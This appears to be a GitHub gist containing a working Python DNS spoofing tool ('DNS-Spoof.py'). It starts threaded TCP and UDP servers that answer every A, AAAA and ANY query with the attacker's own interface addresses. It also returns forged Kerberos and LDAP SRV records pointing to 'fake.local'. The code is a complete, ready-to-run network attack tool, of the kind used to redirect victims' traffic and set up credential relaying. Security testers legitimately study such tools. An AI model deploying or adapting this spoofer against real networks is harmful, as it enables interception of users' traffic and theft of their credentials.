Last active
June 5, 2021 08:12
-
-
Save FrankSpierings/7d8accbffd22df897dc4e33629f7f0d2 to your computer and use it in GitHub Desktop.
DNS-Spoof.py (IPv6 and IPv4)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import threading | |
import socketserver | |
import time | |
from dnslib import * | |
import struct | |
import netifaces | |
import logging | |
import logging.config | |
import json | |
import argparse | |
# Dictionary handed to logging.config.dictConfig() by the script entry point.
# Everything is routed through a single stdout handler at DEBUG level.
logconfig = {
    "version": 1,
    "disable_existing_loggers": False,
    "formatters": {
        # Plain formatter; defined here but not attached to any handler below.
        "standard": {
            "format": "%(levelname)s:%(name)s:%(message)s",
        },
        # "()" names the factory dictConfig calls to build the formatter.
        "colored": {
            "()": "colorlog.ColoredFormatter",
            "format": "%(log_color)s%(asctime)s %(levelname)-8s%(reset)s %(blue)s%(message)s",
        },
    },
    "handlers": {
        "default": {
            "level": "DEBUG",
            "formatter": "colored",
            "class": "logging.StreamHandler",
            "stream": "ext://sys.stdout",
        },
    },
    "loggers": {
        # The empty name configures the root logger.
        "": {
            "handlers": ["default"],
            "level": "DEBUG",
            "propagate": True,
        },
    },
}
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    """Answer one DNS query received over an accepted TCP connection.

    A DNS message on TCP is preceded by a two-byte, big-endian length field.
    The handler reads that prefix, reads exactly that many bytes of query,
    passes them to ``dns_reply`` and sends the packed reply back using the
    same length-prefixed framing.
    """

    def _recv_exact(self, count):
        """Read exactly ``count`` bytes from the connection.

        ``socket.recv`` may return fewer bytes than requested, so keep
        reading until the full amount has arrived.

        Returns:
            The ``count`` bytes read, or ``None`` if the peer closed the
            connection before that many bytes were received.
        """
        chunks = []
        remaining = count
        while remaining > 0:
            chunk = self.request.recv(remaining)
            if not chunk:
                # An empty read on a stream socket means the peer hung up.
                return None
            chunks.append(chunk)
            remaining -= len(chunk)
        return b''.join(chunks)

    def handle(self):
        """Serve a single length-prefixed query; drop truncated requests."""
        self.logger = logging.getLogger(self.__class__.__name__)

        header = self._recv_exact(2)
        if header is None:
            self.logger.debug('{0} closed the connection before sending a query'.format(self.client_address[0]))
            return
        size = struct.unpack('>H', header)[0]

        data = self._recv_exact(size)
        if data is None:
            self.logger.debug('{0} closed the connection before sending the full query'.format(self.client_address[0]))
            return

        reply = dns_reply(self, data).pack()
        # The reply carries the same two-byte length prefix as the request.
        self.request.sendall(struct.pack('>H', len(reply)) + reply)
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
    """Answer one DNS query received as a UDP datagram."""

    def handle(self):
        """Build a reply for the datagram and send it back to the sender."""
        self.logger = logging.getLogger(type(self).__name__)
        # For datagram servers ``self.request`` is a (payload, socket) pair.
        payload, sock = self.request
        answer = dns_reply(self, payload)
        sock.sendto(answer.pack(), self.client_address)
def dns_reply(self, data):
    """Parse a raw DNS query and build the spoofed reply for it.

    Args:
        self: The request handler invoking this function; its ``logger`` and
            ``client_address`` attributes are used for logging.
        data: The raw DNS query bytes (without any TCP length prefix).

    Returns:
        The reply record created from the query, with answers added for
        A, AAAA, ANY and SRV questions.  A/AAAA answers use the module-level
        ``ANSWER_A`` / ``ANSWER_AAAA`` values and are skipped when those are
        ``None``.  Other question types get no answer.
    """
    client = self.client_address[0]
    self.logger.debug('{0} Raw query:\n{1}'.format(client, data))
    query = DNSRecord.parse(data)
    self.logger.info('{0} Query:\n{1}'.format(client, query))
    reply = query.reply()

    for question in query.questions:
        name = str(question.qname)
        kind = question.qtype

        if kind == QTYPE.SRV:
            # Point well-known service lookups at their standard ports.
            if name.startswith('_kerberos'):
                port = 88
            elif name.startswith('_ldap'):
                port = 389
            else:
                port = 0
            reply.add_answer(RR(name, QTYPE.SRV, rdata=SRV(weight=1000, priority=0, port=port, target='fake.local')))
            continue

        # ANY receives both address records, A first and then AAAA.
        if kind in (QTYPE.A, QTYPE.ANY) and ANSWER_A is not None:
            reply.add_answer(RR(name, QTYPE.A, rdata=A(ANSWER_A)))
        if kind in (QTYPE.AAAA, QTYPE.ANY) and ANSWER_AAAA is not None:
            reply.add_answer(RR(name, QTYPE.AAAA, rdata=AAAA(ANSWER_AAAA)))

    self.logger.info('{0} Reply:\n{1}'.format(client, reply))
    return reply
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server on an IPv6 socket that handles each request in a thread."""

    address_family = socket.AF_INET6
    # Has to be a class attribute: the constructor binds the socket, so
    # setting this on an instance afterwards is too late to take effect.
    allow_reuse_address = True
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
    """UDP server on an IPv6 socket that handles each datagram in a thread."""

    address_family = socket.AF_INET6
    # Has to be a class attribute: the constructor binds the socket, so
    # setting this on an instance afterwards is too late to take effect.
    allow_reuse_address = True
# Script entry point: spoof DNS answers with the addresses of one interface.
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Spoof DNS replies')
    parser.add_argument('interface', help='Interface to listen on')
    parser.add_argument('-p', dest='port', type=int, default=53, help='Port to listen on')
    args = parser.parse_args()

    logging.config.dictConfig(logconfig)
    logger = logging.getLogger()

    HOST = ""
    PORT = args.port

    # Create the servers unbound so that address reuse can be enabled
    # *before* the socket is bound; setting it after binding has no effect.
    servers = []
    for server_class, handler_class in (
        (ThreadedTCPServer, ThreadedTCPRequestHandler),
        (ThreadedUDPServer, ThreadedUDPRequestHandler),
    ):
        server = server_class((HOST, PORT), handler_class, bind_and_activate=False)
        server.allow_reuse_address = True
        server.server_bind()
        server.server_activate()
        servers.append(server)

    # Addresses placed in spoofed answers.  These are module-level names read
    # by dns_reply(); None means "do not answer that record type".
    ANSWER_A = None
    ANSWER_AAAA = None
    try:
        ANSWER_A = netifaces.ifaddresses(args.interface)[netifaces.AF_INET][0]['addr']
    except (ValueError, KeyError, IndexError):
        # Unknown interface or no IPv4 address on it: keep going without A.
        logger.warning('No IPv4 address found on {0}; A queries will not be answered'.format(args.interface))
    try:
        # Drop the "%scope" suffix that link-local addresses carry.
        ANSWER_AAAA = netifaces.ifaddresses(args.interface)[netifaces.AF_INET6][0]['addr'].split('%')[0]
    except (ValueError, KeyError, IndexError):
        # Unknown interface or no IPv6 address on it: keep going without AAAA.
        logger.warning('No IPv6 address found on {0}; AAAA queries will not be answered'.format(args.interface))
    logger.info("Ipv4 Address: {0}".format(ANSWER_A))
    logger.info("Ipv6 Address: {0}".format(ANSWER_AAAA))

    for server in servers:
        server_thread = threading.Thread(target=server.serve_forever)
        server_thread.daemon = True
        server_thread.start()

    logger.info('CTRL+C to end')
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    finally:
        # Stop the serve loops, then release the listening sockets.
        for server in servers:
            server.shutdown()
            server.server_close()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment